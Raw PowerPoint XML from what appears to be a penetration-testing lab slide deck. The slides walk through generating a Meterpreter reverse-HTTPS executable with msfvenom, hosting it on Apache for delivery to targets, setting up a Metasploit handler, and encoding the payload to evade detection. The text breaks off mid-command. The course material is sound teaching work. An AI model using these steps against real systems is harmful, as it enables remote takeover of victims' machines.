            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19543672">
            <a:off x="-194468" y="2588094"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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3501390" marR="5080" indent="-3475354">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Weaponization, Delivery and Exploitation in  Practice!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78739" y="1193546"/>
            <a:ext cx="8487410" cy="4767580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" marR="149225" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>In this exercise we are going to build a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-114" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>executable  that makes a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>reverse https </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>connection back to the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>attacker  machine </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(basic</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Weaponization)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>We then </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>send </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>link </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>hosting the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-65" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>targets  (delivery)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="638810" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>target </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>runs the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(exploitation) we will </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>receive</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>a  https</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-85" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>connection</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="130810" indent="-342900" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>We will utilize </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Meterpreter </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>to conduct </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>some </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>actions</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(actions  on intent) as we have no plan for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>installation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>our </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>tools on  the target or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>setting </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>up a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>command </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and control</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-40" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mechanism!</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="260985" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>We will encode </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>our </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>executable and wrap it in a benign  executable to reduce </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>detection rate (further</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-55" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Weaponization)</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="5562548"/>
            <a:ext cx="1600200" cy="1274445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>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274573" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1017269">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Weaponization </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>Delivery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78739" y="1134617"/>
            <a:ext cx="7167880" cy="5375910"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>On your Kali (IP address of 192.168.248.130</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-155" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" marR="5080" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>root@kali:~# msfvenom -p </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>windows/meterpreter/reverse_https  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>LHOST=192.168.248.130 LPORT=443 -f exe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/var/www/html/reverse_https.exe</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="756285" lvl="1" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="756285" algn="l"/>
                <a:tab pos="756920" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>root@kali:~# service apache2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" spc="-155" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>start</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="354965" algn="l"/>
                <a:tab pos="355600" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>On</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-95" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kali:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="414655" marR="4060190" indent="-1905">
              <a:lnSpc>
                <a:spcPts val="1780"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>root@kali:~# service postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>start  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>root@kali:~#</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-70" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="728980">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1170"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt; use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-20" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>exploit/multi/handler</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="1" indent="-198120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1250"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="927735" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf exploit(handler) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PAYLOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>windows/meterpreter/reverse_https</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buChar char="–"/>
            </a:pPr>
            <a:endParaRPr sz="1050">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" lvl="1" indent="-198120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Times New Roman"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="927735" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>msf exploit(handler) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>LHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-35" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
